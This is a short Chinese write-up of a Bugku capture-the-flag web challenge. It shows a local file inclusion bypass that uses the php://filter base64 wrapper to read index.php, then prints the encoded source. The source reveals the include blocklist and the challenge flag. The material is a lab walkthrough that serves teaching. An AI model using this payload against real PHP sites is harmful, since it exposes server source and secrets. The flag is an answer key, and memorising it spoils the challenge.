bugku_web flag在index里

打开网页:

bugku_web flag在index里_第1张图片

点击之后url变成了:

bugku_web flag在index里_第2张图片

看到?file=show.php在结合题目 flag在index里 很容易想到文件包含

试试:http://120.24.86.145:8005/post/index.php?file=file_get_contents(index.php)

bugku_web flag在index里_第3张图片

在试了其他的文件读取函数发现什么都没输出,说明可能有过滤条件得绕过过滤

通过php伪协议利用PHP://filter/read=convert.base64-encode/resource=xxx将文件的base64加密后读取出来,达到绕过过滤的目的

http://120.24.86.145:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=index.php

bugku_web flag在index里_第4张图片


得到一段base64加密后的数据:

PGh0bWw+DQogICAgPHRpdGxlPkJ1Z2t1LWN0ZjwvdGl0bGU+DQogICAgDQo8P3BocA0KCWVycm9yX3JlcG9ydGluZygwKTsNCglpZighJF9HRVRbZmlsZV0pe2VjaG8gJzxhIGhyZWY9Ii4vaW5kZXgucGhwP2ZpbGU9c2hvdy5waHAiPmNsaWNrIG1lPyBubzwvYT4nO30NCgkkZmlsZT0kX0dFVFsnZmlsZSddOw0KCWlmKHN0cnN0cigkZmlsZSwiLi4vIil8fHN0cmlzdHIoJGZpbGUsICJ0cCIpfHxzdHJpc3RyKCRmaWxlLCJpbnB1dCIpfHxzdHJpc3RyKCRmaWxlLCJkYXRhIikpew0KCQllY2hvICJPaCBubyEiOw0KCQlleGl0KCk7DQoJfQ0KCWluY2x1ZGUoJGZpbGUpOyANCi8vZmxhZzpmbGFne2VkdWxjbmlfZWxpZl9sYWNvbF9zaV9zaWh0fQ0KPz4NCjwvaHRtbD4NCg==

解密后得到flag

bugku_web flag在index里_第5张图片









你可能感兴趣的:(bugku,wp)